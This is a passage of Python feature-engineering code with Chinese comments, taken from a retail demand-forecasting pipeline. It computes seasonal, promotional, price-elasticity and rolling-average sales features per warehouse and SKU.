longtail_data[longtail_data.wh_id == wh_id]\n if len(possion_data) == 0:\n continue\n\n # 按天拆分泊松分布预测值\n merged_results = count_data.merge(possion_data, how='left', on='cat2_name')\n merged_results['possion_val_day'] = merged_results['possion_val'] * merged_results['sale_ratio']\n possion_data = merged_results[['bu_id', 'wh_id', 'sku_id', 'day_abbr', 'possion_val_day']].dropna()\n\n # 与测试日期合并\n test_date = df_total_raw[df_total_raw.is_train == 0][['date', 'day_abbr']]\n test_date.drop_duplicates(subset=['date'], keep='first', inplace=True)\n possion_data = possion_data.merge(test_date, how='left', on=['day_abbr'])[\n ['bu_id', 'wh_id', 'sku_id', 'date', 'possion_val_day']\n ]\n\n # 汇总长尾数据\n longtail_results.append(possion_data)\n\n return pd.concat(results), pd.concat(longtail_results)\n\n @staticmethod\n def get_seasonal_data(df_train_total, dim_field, col_name):\n \"\"\"\n 分维度计算周期特征\n :param df_train_total: 训练数据\n :param dim_field: 维度字段\n :param col_name: 周期字段\n :return: 特征数据\n \"\"\"\n # 各维度销量均值\n sale_mean = df_train_total.groupby(dim_field, as_index=False).arranged_cnt.mean()\n\n # 星期销量均值/日常销量均值\n if col_name == 'day_abbr':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_week_avg'\n week_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n week_mean = week_mean.merge(sale_mean, how='left', on=[dim_field], suffixes=('_week', '_total'))\n week_mean[new_col_name] = week_mean['arranged_cnt_week'] / week_mean['arranged_cnt_total']\n return week_mean, new_col_name\n\n # 月份销量均值/日常销量均值\n if col_name == 'month':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_month_avg'\n month_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n month_mean = month_mean.merge(sale_mean, how='left', on=[dim_field], suffixes=('_week', '_total'))\n month_mean[new_col_name] = month_mean['arranged_cnt_week'] / month_mean['arranged_cnt_total']\n return month_mean, new_col_name\n\n # 品牌销量均值/日常销量均值\n if col_name == 'brand_name':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_brand_avg'\n brand_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n brand_mean = brand_mean.merge(sale_mean, how='left', on=[dim_field], suffixes=('_week', '_total'))\n brand_mean[new_col_name] = brand_mean['arranged_cnt_week'] / brand_mean['arranged_cnt_total']\n return brand_mean, new_col_name\n\n # 节假日销量均值/日常销量均值\n if col_name == 'festival_name':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_fevl_avg'\n fevl_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n fevl_mean.rename(columns={'arranged_cnt': new_col_name}, inplace=True)\n fevl_mean = fevl_mean.merge(sale_mean)\n fevl_mean[new_col_name] = fevl_mean[new_col_name] / fevl_mean['arranged_cnt']\n del fevl_mean['arranged_cnt']\n return fevl_mean, new_col_name\n\n # 西方节假日销量均值/日常销量均值\n if col_name == 'western_festival_name':\n new_col_name = dim_field[0:dim_field.rfind('_')] + '_wfevl_avg'\n wfevl_mean = df_train_total.groupby([dim_field, col_name], as_index=False).arranged_cnt.mean()\n wfevl_mean.rename(columns={'arranged_cnt': new_col_name}, inplace=True)\n wfevl_mean = wfevl_mean.merge(sale_mean)\n wfevl_mean[new_col_name] = wfevl_mean[new_col_name] / wfevl_mean['arranged_cnt']\n del wfevl_mean['arranged_cnt']\n return wfevl_mean, new_col_name\n\n @staticmethod\n def seasonal_count(df_total_raw, df_train_total):\n \"\"\"\n 周期性统计特征\n :param df_total_raw: 原始数据\n :param df_train_total: 训练数据\n :return: 周期性特征数据\n \"\"\"\n dim_field_list = ['wh_id', 'cat1_name', 'cat2_name']\n col_field_list = ['day_abbr', 'month', 'brand_name', 'festival_name', 'western_festival_name']\n\n for dim_field in dim_field_list:\n for col_field in col_field_list:\n feature_data, feature_name = DerivedFeature.get_seasonal_data(df_train_total, dim_field, col_field)\n df_total_raw = df_total_raw.merge(feature_data[[dim_field, col_field, feature_name]],\n how='left', on=[dim_field, col_field])\n return df_total_raw.fillna(0.)\n\n @staticmethod\n def get_sale_ratio(total_data, total_train_data):\n \"\"\"\n 获取销售比率\n :param total_data: 原始数据\n :param total_train_data: 训练数据\n :return: 销售比率结果\n \"\"\"\n\n results = []\n for wh_id, df_total_raw in total_data.groupby('wh_id'):\n # step1: 非长尾数据处理\n train_data = df_total_raw[df_total_raw.is_train == 1]\n\n # 基准数据\n day_base = pd.DataFrame({'day_abbr': total_train_data['day_abbr'].unique()})\n cat2_base = pd.DataFrame({'cat2_name': total_train_data['cat2_name'].unique()})\n list_base = list(itertools.product(day_base.values.tolist(), cat2_base.values.tolist()))\n df_base = pd.DataFrame(list(map(lambda x: sum(x, []), list_base)), columns=['day_abbr', 'cat2_name'])\n\n # 各品类统计值\n dt_range = train_data.sort_values('dt').dt.unique()[-45:]\n part_train = train_data[train_data.dt.isin(dt_range)]\n count_data = part_train.groupby(['cat2_name', 'day_abbr'], as_index=False)['arranged_cnt'] \\\n .agg({'day_avg': np.mean})\n count_data['day_avg'] += 0.01\n count_data['week_sum'] = count_data.groupby(['cat2_name']).transform(np.sum).iloc[:, -1]\n count_data['sale_ratio'] = count_data['day_avg'] / count_data['week_sum']\n\n # 与基准数据合并,填补空值\n count_data = df_base.merge(count_data, how='left', on=['cat2_name', 'day_abbr'])\n count_data.loc[count_data['day_avg'].isnull() == True, ['day_avg', 'week_sum', 'sale_ratio']] \\\n = [1, 7, 1 / 7]\n\n # 品类销量占比特征\n col = ['cat2_name', 'day_abbr', 'sale_ratio']\n df_total_raw = df_total_raw.merge(count_data[col], how='left', on=['cat2_name', 'day_abbr'])\n\n results.append(df_total_raw)\n\n return pd.concat(results)\n\n @staticmethod\n def byrs_count(df_total_raw, df_train_total, col_list=None):\n \"\"\"\n 商户数量统计特征\n :param df_total_raw: 原始数据\n :param df_train_total: 原始训练数据\n :param col_list: 商户原始特征(返回时废弃)\n :return: 商户数量统计特征\n \"\"\"\n\n for col in col_list:\n # 要转化的商户特征\n week_col_name = col + '_week_avg'\n month_col_name = col + '_month_avg'\n fevl_col_name = col + '_fevl_avg'\n wfevl_col_name = col + '_wfevl_avg'\n\n # 商户数均值\n _mean = df_train_total[col].mean()\n\n # 星期商户均值/日常商户均值\n _week_mean = df_train_total.groupby(['day_abbr'], as_index=False)[[col]].mean()\n _week_mean[week_col_name] = _week_mean.iloc[:, -1] / _mean\n\n # 月份商户均值/日常商户均值\n _month_mean = df_train_total.groupby(['month'], as_index=False)[[col]].mean()\n _month_mean[month_col_name] = _month_mean.iloc[:, -1] / _mean\n\n # 节假日商户均值/日常商户均值\n _fevl_mean = df_train_total.groupby(['festival_name'], as_index=False)[[col]].mean()\n _fevl_mean[fevl_col_name] = _fevl_mean.iloc[:, -1] / _mean\n\n # 品类西方节假日商户均值/日常商户均值\n _wfevl_mean = df_train_total.groupby(['western_festival_name'], as_index=False)[[col]].mean()\n _wfevl_mean[wfevl_col_name] = _wfevl_mean.iloc[:, -1] / _mean\n\n # 合并数据\n df_total_raw = df_total_raw.merge(_week_mean[['day_abbr', week_col_name]],\n how='left', on=['day_abbr'])\n df_total_raw = df_total_raw.merge(_month_mean[['month', month_col_name]],\n how='left', on=['month'])\n df_total_raw = df_total_raw.merge(_fevl_mean[['festival_name', fevl_col_name]],\n how='left', on=['festival_name'])\n df_total_raw = df_total_raw.merge(_wfevl_mean[['western_festival_name', wfevl_col_name]],\n how='left', on=['western_festival_name'])\n # 返回去除原始商户特征的数据\n return df_total_raw.fillna(0.).drop(col_list, axis=1)\n\n @staticmethod\n def cnt_band_func(df_total_raw):\n \"\"\"\n (根据销量范围)计算商品销量等级\n :param df_total_raw: 原始数据\n :return: 销量等级\n \"\"\"\n # band级数和标签\n cut_num = 4\n label_names = np.arange(cut_num - 1, -1, step=-1)\n df_train = df_total_raw[df_total_raw.is_train == 1].sort_values('dt')\n\n cnt_band_data = [] # 二级品类band中间数据\n qpl_band_data = [] # 全品类band中间数据\n total_data = [] # 返回数据\n dt_set = set() # 防止数据重复\n\n # 以7天为窗口滑动\n dt_range = pd.date_range(df_train.dt.iloc[0], df_train.dt.iloc[-1])\n for i in range(7, len(dt_range) + 1):\n # 窗口数据生成\n dt_window = dt_range[i - 7:i]\n window_data = df_train[df_train.dt.isin(dt_window)]\n\n # 跳过无售卖记录期间\n if len(window_data) == 0:\n continue\n\n # 计算窗口内二级品类下各sku销量均值\n cat2_group = window_data.groupby(['cat2_name', 'sku_id'], as_index=False)['arranged_cnt'] \\\n .agg({'arr_mean': np.mean})\n\n # 计算窗口内各sku销量均值\n qpl_group = window_data.groupby('sku_id', as_index=False)['arranged_cnt'] \\\n .agg({'arr_mean': np.mean})\n\n # 用于关联的dt键\n dt_key = window_data.dt.iloc[-1]\n\n # 保存已经滑过的窗口日期\n if dt_key in dt_set:\n continue\n dt_set.add(dt_key)\n\n cat2_group['dt'] = dt_key\n qpl_group['dt'] = dt_key\n\n # 计算二级品类下各sku销量band\n for cat2, group in cat2_group.groupby('cat2_name'):\n cnt_label = pd.cut(group.arr_mean.astype(np.float32), cut_num, precision=2, labels=label_names)\n df_label = pd.DataFrame({'dt': dt_key,\n 'cat2_name': cat2,\n 'sku_id': group.sku_id,\n 'cnt_band_area': cnt_label.astype(np.int32)\n })\n cnt_band_data.append(df_label)\n\n # 计算全品类下各sku销量band\n qpl_cnt_label = pd.cut(qpl_group.arr_mean.astype(np.float32), cut_num, precision=2, labels=label_names)\n qpl_df_label = pd.DataFrame({'dt': dt_key,\n 'sku_id': qpl_group.sku_id,\n 'cnt_band_area_qpl': qpl_cnt_label.astype(np.int32)\n })\n qpl_band_data.append(qpl_df_label)\n\n cnt_band_data = pd.concat(cnt_band_data)\n qpl_band_data = pd.concat(qpl_band_data)\n\n # 合并特征列\n total_data_raw = df_total_raw.merge(cnt_band_data, how='left', on=['dt', 'cat2_name', 'sku_id'])\n total_data_raw = total_data_raw.merge(qpl_band_data, how='left', on=['dt', 'sku_id'])\n\n # 处理空值\n for sku, sku_data in total_data_raw.groupby('sku_id'):\n total_data.append(sku_data.fillna(method='bfill').fillna(method='ffill'))\n\n return pd.concat(total_data)\n\n @staticmethod\n def get_statistic_features(df_total_raw):\n \"\"\"\n sku统计特征\n :param df_total_raw: 原始数据\n :return: sku统计特征\n \"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n sku_data_list = []\n\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n dt_array = sku_data.dt.unique()\n dt_lenth = len(dt_array)\n\n arr_list = sku_data[sku_data.is_train == 1]['arranged_cnt'].tolist()\n\n # 将数据前移20天\n arr_array = np.concatenate([[arr_list[0]] * 20, arr_list])\n\n # 历史销量\n itvl_avg = arr_array.cumsum() / (pd.Series(arr_array).index + 1)\n\n # 历史销量指数均值\n itvl_ewm_avg = pd.Series(arr_array).ewm(span=4, min_periods=1).mean()\n\n # 滑动窗口统计值\n roll_arr_obj = pd.Series(arr_array).rolling(7, min_periods=1)\n\n itvl_roll_avg = roll_arr_obj.mean() # 销量滑动窗口均值\n itvl_roll_max = roll_arr_obj.max() # 销量滑动窗口最大值\n itvl_roll_min = roll_arr_obj.min() # 销量滑动窗口最小值\n\n sku_data_list.append(pd.DataFrame({'sku_id': [sku] * dt_lenth,\n 'itvl_avg': itvl_avg,\n 'itvl_ewm_avg': itvl_ewm_avg,\n 'itvl_roll_avg': itvl_roll_avg,\n 'itvl_roll_max': itvl_roll_max,\n 'itvl_roll_min': itvl_roll_min,\n 'dt': dt_array\n }))\n\n return df_total_raw.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n\n @staticmethod\n def pro_statistic_features(data):\n \"\"\"\n 促销统计特征\n :param data: 原始数据\n :return: 促销统计特征\n \"\"\"\n dim_fields = ['brand_name', 'cat1_name', 'cat2_name']\n act_fields = ['seq_num', 'pro_num', 'csu_redu_num']\n\n for dim in dim_fields:\n for act in act_fields:\n col_name = dim[0:dim.rfind('_')] + '_' + act[0:act.rfind('_')] + '_count'\n act_data = data.groupby(['dt', dim], as_index=False)[act].agg({col_name: np.sum})\n data = data.merge(act_data, how='left', on=['dt', dim])\n return data.fillna(0.)\n\n @staticmethod\n def price_derived_features(df_total_raw):\n \"\"\"\n 价格衍生特征制造\n :param df_total_raw: 原始数据\n :return: 价格特征\n \"\"\"\n # 差价特征\n # 促销活动差价\n df_total_raw['sp_pdiff'] = df_total_raw['seq_price'] - df_total_raw['discount_price']\n # 真实差价\n df_total_raw['real_pdiff'] = df_total_raw['csu_origin_price'] - df_total_raw['w_price']\n\n # 折扣力度\n price_diff_seq = df_total_raw['csu_origin_price'] - df_total_raw['seq_price']\n price_diff_pro = df_total_raw['csu_origin_price'] - df_total_raw['discount_price']\n price_diff_real = df_total_raw['csu_origin_price'] - df_total_raw['w_price']\n\n # 秒杀折扣\n df_total_raw['seq_rebate'] = price_diff_seq / df_total_raw['csu_origin_price']\n # 促销折扣\n df_total_raw['pro_rebate'] = price_diff_pro / df_total_raw['csu_origin_price']\n # 实际折扣\n df_total_raw['real_rebate'] = price_diff_real / df_total_raw['csu_origin_price']\n\n # 竞品折扣\n # 竞品秒杀力度\n seq_data = df_total_raw.groupby(['dt', 'cat2_name'], as_index=False)['seq_rebate'] \\\n .agg({'max_seq_rebate': np.max,\n 'mean_seq_rebate': np.mean})\n # 竞品单品促销力度\n pro_data = df_total_raw.groupby(['dt', 'cat2_name'], as_index=False)['pro_rebate'] \\\n .agg({'max_pro_rebate': np.max,\n 'mean_pro_rebate': np.mean})\n # 竞品实际折扣\n real_data = df_total_raw.groupby(['dt', 'cat2_name'], as_index=False)['real_rebate'] \\\n .agg({'max_real_rebate': np.max,\n 'mean_real_rebate': np.mean})\n\n # 合并数据\n rebate_data = seq_data.merge(pro_data, how='outer', on=['dt', 'cat2_name'])\n rebate_data = rebate_data.merge(real_data, how='outer', on=['dt', 'cat2_name'])\n df_total_raw = df_total_raw.merge(rebate_data, how='left', on=['dt', 'cat2_name']) \\\n .fillna(0.) \\\n .sort_values('dt')\n\n # 滑动(加权)价格特征\n sku_data_list = []\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n df_sku = sku_data[sku_data.is_train == 1]\n\n # 7天滑动(加权)价格均值\n price_7d_roll = df_sku['w_price'].rolling(7, min_periods=1).mean()\n\n # T+0数据\n mov_price_avg = np.insert(np.array(price_7d_roll), 0, price_7d_roll.iloc[0], axis=0)\n\n # 外推覆盖未来20天\n price_list = np.append(df_sku['w_price'], price_7d_roll.iloc[-1])\n for i in range(19):\n if len(price_list) < 7:\n avg_7d = np.mean(price_list)\n else:\n avg_7d = np.mean(price_list[-7:])\n price_list = np.append(price_list, avg_7d)\n mov_price_avg = np.concatenate([mov_price_avg, price_list[-19:]])\n\n sku_data_list.append(pd.DataFrame({'sku_id': sku,\n 'dt': sku_data.dt.unique(),\n 'mov_price_avg': mov_price_avg\n }))\n # 合并sku数据\n df_total_raw = df_total_raw.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n # 原价/滑动价格差价\n df_total_raw['mov_delta_cprice'] = df_total_raw['csu_origin_price'] - df_total_raw['mov_price_avg']\n # 加权价/滑动价格差价\n df_total_raw['mov_delta_wprice'] = df_total_raw['w_price'] - df_total_raw['mov_price_avg']\n\n return df_total_raw\n\n @staticmethod\n def get_price_elasticity(df_total_raw):\n \"\"\"\n 价格弹性计算\n :param df_total_raw: 原始数据\n :return: 价格弹性系数\n \"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n\n # 赋初始值\n ed_dic = {sku: 0. for sku in df_total_raw.sku_id.unique()}\n\n # 过滤满减数据\n df_ed = df_total_raw[(df_total_raw.is_train == 1) &\n (df_total_raw.csu_redu_num == 0) &\n (df_total_raw.arranged_cnt > 0)]\n\n # 计算价格弹性系数\n for sku, sku_train in df_ed.groupby('sku_id'):\n # 数据量限制\n if len(sku_train) < 15:\n continue\n # 使用滑动均值价格\n price_and_arr = sku_train[['w_price', 'arranged_cnt']].rolling(15, min_periods=15).mean()\n\n # 价格和销量变动值\n _delta = (price_and_arr - price_and_arr.shift(1)).rename(columns={'w_price': 'delta_price',\n 'arranged_cnt': 'delta_arr'})\n # 合并两部分数据\n _delta = price_and_arr.join(_delta.shift(-1)).dropna()\n _delta = _delta[_delta.delta_price != 0]\n\n # 过滤价格无波动的sku\n if len(_delta) == 0:\n continue\n\n # 计算价格弹性系数\n darr = _delta['delta_arr']\n arr = _delta['arranged_cnt']\n dp = _delta['delta_price']\n p = _delta['w_price']\n ed = -(darr / arr) / (dp / p)\n\n # 过滤弹性系数中的异常值\n Q1 = np.percentile(ed, 25)\n Q3 = np.percentile(ed, 75)\n step = (Q3 - Q1) * 1.5\n mean_ed = ed[(ed <= Q3 + step) & (ed >= Q1 - step)].mean()\n\n # 更新弹性系数\n if not np.isnan(mean_ed):\n ed_dic[sku] = mean_ed\n\n # 生成价格弹性特征\n ed_list = [[sku_id, ed_dic[sku_id]] for sku_id in ed_dic.keys()]\n df_ed = pd.DataFrame(ed_list, columns=['sku_id', 'ed_val'])\n\n return df_total_raw.merge(df_ed, how='left', on=['sku_id']).sort_values('dt')\n\n @staticmethod\n def ed_pred_sale(df_total_raw):\n \"\"\"\n 价格弹性销量\n :param df_total_raw: (含价格弹性特征的)原始数据\n :return: 价格弹性销量\n \"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n sku_data_list = []\n\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n # 获取弹性系数\n ed_val = sku_data['ed_val'].unique()[0]\n\n _shift = sku_data[['w_price', 'arranged_cnt']].shift(1) \\\n .rename(columns={'w_price': 'last_price',\n 'arranged_cnt': 'last_arr'})\n _shift = _shift.join(sku_data[['w_price', 'arranged_cnt', 'is_train']])\n\n # 修正测试集数据\n last_price = sku_data[sku_data.is_train == 1]['w_price'].iloc[-1]\n last_arr = sku_data[sku_data.is_train == 1]['arranged_cnt'].iloc[-1]\n _shift.loc[_shift.is_train == 0, 'last_price'] = last_price\n _shift.loc[_shift.is_train == 0, 'last_arr'] = last_arr\n\n # 价格一阶差分\n _shift['delta_price'] = _shift['w_price'] - _shift['last_price']\n\n # 填补缺失值\n _shift.loc[_shift['last_price'].isnull() == True, 'last_price'] \\\n = _shift.loc[_shift['last_price'].isnull() == True, 'w_price']\n\n _shift.loc[_shift['last_arr'].isnull() == True, 'last_arr'] \\\n = _shift.loc[_shift['last_arr'].isnull() == True, 'arranged_cnt']\n\n _shift.loc[_shift['delta_price'].isnull() == True, 'delta_price'] = 0.\n\n # 计算销量\n lp = _shift['last_price']\n _delta_p = _shift['delta_price']\n la = _shift['last_arr']\n dp = _delta_p / lp\n ed_pred_arr = la * (1 - dp * ed_val)\n\n # 后处理\n ed_pred_arr[ed_pred_arr < 0] = 0\n sku_data = sku_data.join(pd.DataFrame(_shift['delta_price'], columns=['delta_price'])) \\\n .join(pd.DataFrame(ed_pred_arr, columns=['ed_pred_arr'])) \\\n .fillna(method='bfill') \\\n .fillna(method='ffill')\n sku_data_list.append(sku_data)\n\n return pd.concat(sku_data_list)\n\n @staticmethod\n def get_price_statistic_features(df_total_raw):\n \"\"\"\n 价格弹性衍生特征\n :param df_total_raw: (含价格弹性特征的)原始数据\n :return: 价格弹性(价格、销量)衍生特征\n \"\"\"\n df_total_raw = df_total_raw.sort_values('dt')\n sku_data_list = []\n sale_price_dic = {}\n\n for sku, sku_data in df_total_raw.groupby('sku_id'):\n dt_array = sku_data.dt.unique()\n dt_lenth = len(dt_array)\n\n arr_list = sku_data[sku_data.is_train == 1]['arranged_cnt'].tolist()\n price_list = sku_data[sku_data.is_train == 1]['w_price'].tolist()\n\n # 将数据前移20天\n arr_array = np.concatenate([[arr_list[0]] * 20, arr_list])\n price_array = np.concatenate([[price_list[0]] * 20, price_list])\n\n # 历史销量\n itvl_avg = arr_array.cumsum() / (pd.Series(arr_array).index + 1)\n # 历史价格\n itvl_price = price_array.cumsum() / (pd.Series(price_array).index + 1)\n sale_price_dic['itvl_pred'] = ['itvl_avg', 'itvl_price']\n\n # 历史销量指数均值\n itvl_ewm_avg = pd.Series(arr_array).ewm(span=4, min_periods=1).mean()\n # 历史价格指数均值\n itvl_ewm_price = pd.Series(price_array).ewm(span=4, min_periods=1).mean()\n sale_price_dic['itvl_ewm_pred'] = ['itvl_ewm_avg', 'itvl_ewm_price']\n\n # 滑动窗口统计值\n roll_arr_obj = pd.Series(arr_array).rolling(7, min_periods=1)\n roll_price_obj = pd.Series(price_array).rolling(7, min_periods=1)\n\n itvl_roll_avg = roll_arr_obj.mean() # 销量滑动窗口均值\n itvl_roll_max = roll_arr_obj.max() # 销量滑动窗口最大值\n itvl_roll_min = roll_arr_obj.min() # 销量滑动窗口最小值\n\n itvl_roll_price_avg = roll_price_obj.mean() # 价格滑动窗口均值差值\n itvl_roll_price_max = roll_price_obj.max() # 价格滑动窗口最大值差值\n itvl_roll_price_min = roll_price_obj.min() # 价格滑动窗口最小值差值\n\n sale_price_dic['itvl_roll_avg_pred'] = ['itvl_roll_avg', 'itvl_roll_price_avg']\n sale_price_dic['itvl_roll_max_pred'] = ['itvl_roll_max', 'itvl_roll_price_max']\n sale_price_dic['itvl_roll_min_pred'] = ['itvl_roll_min', 'itvl_roll_price_min']\n\n sku_data_list.append(pd.DataFrame({'sku_id': [sku] * dt_lenth,\n 'itvl_avg': itvl_avg,\n 'itvl_price': itvl_price,\n 'itvl_ewm_avg': itvl_ewm_avg,\n 'itvl_ewm_price': itvl_ewm_price,\n 'itvl_roll_avg': itvl_roll_avg,\n 'itvl_roll_price_avg': itvl_roll_price_avg,\n 'itvl_roll_max': itvl_roll_max,\n 'itvl_roll_price_max': itvl_roll_price_max,\n 'itvl_roll_min': itvl_roll_min,\n 'itvl_roll_price_min': itvl_roll_price_min,\n 'dt': dt_array\n }))\n df_total_raw = df_total_raw.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n\n # 差价特征\n df_total_raw['itvl_avg_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_price']\n df_total_raw['itvl_ewm_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_ewm_price']\n df_total_raw['itvl_roll_avg_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_roll_price_avg']\n df_total_raw['itvl_roll_max_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_roll_price_max']\n df_total_raw['itvl_roll_min_pdiff'] = df_total_raw['w_price'] - df_total_raw['itvl_roll_price_min']\n\n # 价格相关销量\n ed_val = df_total_raw['ed_val']\n price = df_total_raw['w_price']\n for key, value in sale_price_dic.items():\n la = df_total_raw[value[0]]\n lp = df_total_raw[value[1]]\n _delta_p = price - lp\n dp = _delta_p / lp\n\n ed_pred_arr = la * (1 - dp * ed_val)\n ed_pred_arr[ed_pred_arr < 0] = 0\n\n df_total_raw = df_total_raw.join(pd.DataFrame(ed_pred_arr, columns=[key]))\n\n return df_total_raw.fillna(0.)\n\n @staticmethod\n def same_cat_rebate(data):\n \"\"\"\n 竞品折扣信息\n :param data: 原始数据\n :return: 竞品折扣\n \"\"\"\n # 构造差价特征\n data['price_diff_seq'] = data['csu_origin_price'] - data['seq_price']\n data['price_diff_discount'] = data['csu_origin_price'] - data['discount_price']\n data['price_diff_sd'] = data['discount_price'] - data['seq_price']\n\n # 构造折扣特征\n data['seq_rebate'] = data['price_diff_seq'] / data['csu_origin_price']\n data['pro_rebate'] = data['price_diff_discount'] / data['csu_origin_price']\n\n # 秒杀折扣\n seq_data = data.groupby(['dt', 'cat2_name'], as_index=False)['seq_rebate'] \\\n .agg({'max_seq_rebate': np.max, 'mean_seq_rebate': np.mean})\n\n # 大促折扣\n pro_data = data.groupby(['dt', 'cat2_name'], as_index=False)['pro_rebate'] \\\n .agg({'max_pro_rebate': np.max, 'mean_pro_rebate': np.mean})\n\n # 合并数据\n rebate_data = seq_data.merge(pro_data, how='outer', on=['dt', 'cat2_name'])\n\n return data.merge(rebate_data, how='left', on=['dt', 'cat2_name']).fillna(0.)\n\n def his_sale_avg(self, raw_data):\n \"\"\"\n 移动平均销量特征\n \"\"\"\n data = raw_data.sort_values(self.dt_field)\n sku_data_list = []\n\n for sku, sku_data in data.groupby('sku_id'):\n df_sku = sku_data[sku_data.is_train == 1]\n arr_list = df_sku['arranged_cnt']\n\n # 计算7天/15天/30天移动平均值\n roll_7d_avg = arr_list.rolling(7, min_periods=1).mean()\n roll_15d_avg = arr_list.rolling(15, min_periods=1).mean()\n roll_30d_avg = arr_list.rolling(30, min_periods=1).mean()\n\n # 计算(训练集)加权均值\n if self.cat1_id in [10021228]:\n his_avg = roll_7d_avg * 0.6 + roll_15d_avg * 0.3 + roll_30d_avg * 0.1\n else:\n his_avg = (roll_7d_avg + roll_15d_avg + roll_30d_avg) / 3.\n\n # 均值外推, 覆盖未来20天\n arr_and_avg = arr_list.tolist()\n arr_and_avg.append(his_avg.iloc[-1])\n for i in range(19):\n if len(arr_and_avg) < 7:\n avg_7d = np.mean(arr_and_avg)\n else:\n avg_7d = np.mean(arr_and_avg[-7:])\n\n if len(arr_and_avg) < 15:\n avg_15d = np.mean(arr_and_avg)\n else:\n avg_15d = np.mean(arr_and_avg[-15:])\n\n if len(arr_and_avg) < 30:\n avg_30d = np.mean(arr_and_avg)\n else:\n avg_30d = np.mean(arr_and_avg[-30:])\n if self.cat1_id in [10021228]:\n arr_and_avg.append(avg_7d * 0.6 + avg_15d * 0.3 + avg_30d * 0.1)\n else:\n arr_and_avg.append((avg_7d + avg_15d + avg_30d) / 3.)\n his_avg = np.concatenate([[his_avg.iloc[0]], his_avg, arr_and_avg[-19:]])\n\n try:\n sku_data_list.append(pd.DataFrame({'sku_id': sku,\n 'dt': sku_data.dt,\n 'his_avg': his_avg}))\n except:\n print(\"{} 历史销量特征制造异常!\", str(sku))\n continue\n # 最终结果\n data = data.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt']).dropna()\n return data\n\n def his_pro_sale_avg(self, raw_data):\n \"\"\"\n 区分促销/非促销的历史销量特征\n :param raw_data: 原始数据\n :return: 历史销量\n \"\"\"\n df_total = raw_data.sort_values(self.dt_field).reset_index(drop=True)\n\n # 区分促销/非促销数据\n # 非促销数据\n df_total_normal = df_total[(df_total['pro_num'] == 0) &\n (df_total['seq_num'] == 0) &\n (df_total['csu_redu_num'] == 0)]\n # 促销数据\n df_total_pro = df_total[~df_total.index.isin(df_total_normal.index)]\n\n sku_data_list = []\n for data in [df_total_normal, df_total_pro]:\n for sku, sku_data in data.groupby('sku_id'):\n df_sku = sku_data[sku_data.is_train == 1]\n\n # 训练集没有数据\n if len(df_sku) == 0:\n continue\n\n arr_list = df_sku['arranged_cnt']\n days = len(sku_data[sku_data.is_train == 0]) - 1\n\n roll_7d_avg = arr_list.rolling(7, min_periods=1).mean()\n roll_15d_avg = arr_list.rolling(15, min_periods=1).mean()\n roll_30d_avg = arr_list.rolling(30, min_periods=1).mean()\n\n # 计算(训练集)加权均值\n his_avg = roll_7d_avg * 0.7 + roll_15d_avg * 0.2 + roll_30d_avg * 0.1\n\n # 均值外推, 覆盖测试集\n # 测试集没有数据\n if days == -1:\n his_avg = np.concatenate([[his_avg.iloc[0]], his_avg[:-1]])\n # 测试集只有一天\n elif days == 0:\n his_avg = np.concatenate([[his_avg.iloc[0]], his_avg])\n else:\n arr_and_avg = arr_list.tolist()\n arr_and_avg.append(his_avg.iloc[-1])\n\n for i in range(days):\n if len(arr_and_avg) < 7:\n avg_7d = np.mean(arr_and_avg)\n else:\n avg_7d = np.mean(arr_and_avg[-7:])\n\n if len(arr_and_avg) < 15:\n avg_15d = np.mean(arr_and_avg)\n else:\n avg_15d = np.mean(arr_and_avg[-15:])\n\n if len(arr_and_avg) < 30:\n avg_30d = np.mean(arr_and_avg)\n else:\n avg_30d = np.mean(arr_and_avg[-30:])\n arr_and_avg.append(avg_7d * 0.7 + avg_15d * 0.2 + avg_30d * 0.1)\n his_avg = np.concatenate([[his_avg.iloc[0]], his_avg, arr_and_avg[-days:]])\n\n try:\n sku_data_list.append(pd.DataFrame({'sku_id': sku,\n 'dt': sku_data.dt,\n 'pro_his_avg': his_avg}))\n except:\n print(\"{} 历史(促销)销量特征制造异常!\", str(sku))\n continue\n final_data = df_total.merge(pd.concat(sku_data_list), how='left', on=['sku_id', 'dt'])\n\n # (训练集无数据导致的)空值处理\n final_data.loc[final_data['pro_his_avg'].isnull() == True, 'pro_his_avg'] \\\n = final_data.loc[final_data['pro_his_avg'].isnull() == True, 'his_avg']\n return final_data\n\n def create_features(self, total_data, total_train_data):\n \"\"\"\n 特征制造函数\n :param total_data: 原始数据\n :param total_train_data: 训练数据\n :return: (合并后的)特征数据\n \"\"\"\n all_data = []\n for wh_id, data in total_data.groupby('wh_id'):\n try:\n # 日期处理\n data['year'] = pd.to_datetime(data[self.dt_field]).dt.year\n data['month'] = pd.to_datetime(data[self.dt_field]).dt.month\n data['day'] = pd.to_datetime(data[self.dt_field]).dt.day\n\n train_data = total_train_data[total_train_data.wh_id == wh_id]\n train_data['month'] = pd.to_datetime(train_data[self.dt_field]).dt.month\n\n # 特征生产\n data = DerivedFeature.cnt_band_func(data)\n data = self.his_sale_avg(data)\n if self.cat1_id in [10021228]:\n data = self.price_derived_features(data)\n data = self.get_price_elasticity(data)\n data = self.ed_pred_sale(data)\n data = self.get_price_statistic_features(data)\n else:\n data = self.his_pro_sale_avg(data)\n data = self.same_cat_rebate(data)\n data = self.get_statistic_features(data)\n data = self.pro_statistic_features(data)\n data = self.seasonal_count(data, train_data)\n data = self.get_sale_ratio(data, train_data)\n byr_cols = [col for col in 